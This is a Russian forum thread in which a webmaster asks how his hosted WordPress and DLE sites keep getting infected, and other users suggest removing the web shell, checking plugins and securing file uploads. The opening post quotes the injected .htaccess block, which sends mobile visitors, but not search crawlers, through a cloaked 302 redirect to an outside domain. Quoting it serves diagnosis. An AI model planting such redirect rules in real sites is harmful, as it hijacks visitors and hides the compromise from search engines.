Вирус на сайте, откуда лезет?

St1m · 28.07.2013, 14:43

Доброго времени суток.
Прошу помочь вас с проблемой, с которой я уже борюсь не первую неделю.
На хостинге Jino.ru у меня есть 5 сайтов на WordPress и 1 на DLE и с недавнего времени во всех папках меняется файл .htaccess (благодаря этим изменениям все страницы кроме главной выдают ошибку 404). К его содержимому в конце добавляются строки:

Цитата:

#########rataman##########
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamesp y|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|o oyyo|pagebull|scooter|w3c_validator|jigsaw|webalta |yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo |yandexmedia|yandexblogs|yandexaddurl|yandexfavico ns|yandexdirect|yandexmetrika|yandexcatalog|yandex news|yandeximageresizer) [NC]
RewriteRule (.*) http://webconline.net/s/13103 [L,R=302]
#########!rataman!#########

Удаляю код, ставлю права 644 на htaccess и через 2 дня все повторяется по новой. Доступ по FTP закрыт, пароли везде сменил. Скачивал папки доменов себе на комп, чистил Касперским (он нашел шелл), но все равно не помогло.

Сегодня заметил, что Яндекс стал ругаться на сайты - мол, они у тебя заражены (в панели вебмастера соответствующий значок).

Что это может быть? Как бороться?

kerpi · 28.07.2013, 14:53

Цитата:

Сообщение от St1m

Как бороться?

Попробуйте почистить все и запретить заливку файлов на сайт для пользователей + сами покопайте последние загруженные файлы со стороны пользователей.

St1m · 28.07.2013, 15:01

Цитата:

Сообщение от kerpi

Попробуйте почистить все и запретить заливку файлов на сайт для пользователей + сами покопайте последние загруженные файлы со стороны пользователей.

Спасибо за совет.
Только я не пойму как меняется .htacess. Ведь если бы уязвимость была, скажем, в WordPress, то как заразился сайт на DLE? Кто-то по FTP ломать не может, у меня закрыт доступ по FTP.

zhegloff · 28.07.2013, 15:03

Найти шелл.
Удалить.
Удалить весь мусор, который написали через шелл в файлы.
Сменить пароли, закрыть дыры.
Жить спокойно.

kerpi · 28.07.2013, 15:04

Цитата:

Сообщение от St1m

Только я не пойму как меняется .htacess. Ведь если бы уязвимость была, скажем, в WordPress, то как заразился сайт на DLE? Кто-то по FTP ломать не может, у меня закрыт доступ по FTP.

У меня было что вирус попал через 1 сайт и заразил все сайты на хостинге.

Danst · 28.07.2013, 15:25

Цитата:

Сообщение от St1m

Спасибо за совет.
Только я не пойму как меняется .htacess. Ведь если бы уязвимость была, скажем, в WordPress, то как заразился сайт на DLE? Кто-то по FTP ломать не может, у меня закрыт доступ по FTP.

Если все сайты живут в одном месте, так и меняется. Причем тут FTP? Для скриптов PHP это не разные сайты, а просто разные директории на хостинге, и если права позволяют, то писать они могут в любую из них ) Если у Вас хотя бы были виртуальные хосты, то там можно прописать php base dir для каждого виртуального хоста, т. е. скрипты одного сайта смогут крутиться только в той директории, которую Вы указали.

Asterada · 28.07.2013, 15:32

Цитата:

Сообщение от kerpi

вирус попал через 1 сайт и заразил все сайты на хостинге

почему-то мне кажется, что это дырка на хостинге, раз шеллу разрешается так путешествовать между папками сайтов

errora · 28.07.2013, 15:40

ТС, почти год назад ловила подобный. Причина была в плагине вордпреса одного из сайтов (после умел менять хтаксесс у всех на аккаунте хостинга), начните с их просмотра.

St1m · 28.07.2013, 19:54

Цитата:

Сообщение от Asterada

почему-то мне кажется, что это дырка на хостинге, раз шеллу разрешается так путешествовать между папками сайтов

Тоже так сперва подумал, написал в службу поддержки, они меня уверили что все проблемы лишь мои и с их стороны все чисто. Конечно, что еще они могли ответить.

Цитата:

Сообщение от errora

ТС, почти год назад ловила подобный. Причина была в плагине вордпреса одного из сайтов (после умел менять хтаксесс у всех на аккаунте хостинга), начните с их просмотра.

Спасибо за совет, даже понял какой плагин попал под раздачу. Но проблема не только в плагинах, это однозначно. Как Вы, кстати, избавились от вируса? Чистка плагинов помогла?

Danst · 28.07.2013, 20:08

Копайте в том месте, через которое могут загружаться файлы средствами PHP,чаще всего это какие-нибудь визуальные редакторы текста, которые позволяют загружать картинки, например.
Поэтому вполне возможно, что это какая-то форма комментариев у статей, или что-то другое, где этот редактор используется.

В общем, схема простая: загружается файлик PHP через такую дырочку, выполняется с помощью обычного http запроса к нему, в самом файлике несколько строчек кода, которые, как вариант, сканируют на сервере все директории, которые могут, и вставляют произвольный код в любые файлы, которые не ограничены правами, хоть .htaccess, хоть другие php-скрипты, да все что угодно.

28.07.2013, 15:03	#4
zhegloff Добрый модератор Регистрация: 09.07.2007 Адрес: глобус Украины Сообщений: 27,600 Вес репутации: 1025	Найти шелл. Удалить. Удалить весь мусор, который написали через шелл в файлы. Сменить пароли, закрыть дыры. Жить спокойно. __________________ Установка кода сапы от $9.95. Пишите в личку. Правильный хостинг. В личке бесплатно не отвечаю обычно.

28.07.2013, 15:40	#8
errora ашипка Регистрация: 05.04.2008 Адрес: Зазеркалье Сообщений: 2,707 Вес репутации: 388	ТС, почти год назад ловила подобный. Причина была в плагине вордпреса одного из сайтов (после умел менять хтаксесс у всех на аккаунте хостинга), начните с их просмотра. __________________ Все совпадения случайны, имена и даты высосаны из пальца и значения не имеют.

28.07.2013, 20:08	#10
Danst Специалист Регистрация: 10.12.2012 Сообщений: 190 Вес репутации: 147	Копайте в том месте, через которое могут загружаться файлы средствами PHP,чаще всего это какие-нибудь визуальные редакторы текста, которые позволяют загружать картинки, например. Поэтому вполне возможно, что это какая-то форма комментариев у статей, или что-то другое, где этот редактор используется. В общем, схема простая: загружается файлик PHP через такую дырочку, выполняется с помощью обычного http запроса к нему, в самом файлике несколько строчек кода, которые, как вариант, сканируют на сервере все директории, которые могут, и вставляют произвольный код в любые файлы, которые не ограничены правами, хоть .htaccess, хоть другие php-скрипты, да все что угодно. __________________ Отслеживание почтовых отправлений — без капчи, без регистрации, с автоматическими уведомлениями на почту и по sms.

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Вирус на сайте?	lbmoney	Разработка и сопровождение сайтов	9	07.07.2012 23:37
Вирус на сайте	daniel.Rymchuk	Разработка и сопровождение сайтов	3	17.07.2010 19:03
На сайте вирус (	Marisha	Вопросы от новичков	9	26.01.2010 15:56
Вирус на сайте!	paulg	Разработка и сопровождение сайтов	25	12.09.2008 12:15
Вирус на сайте	nevermore	Разработка и сопровождение сайтов	10	19.04.2008 00:13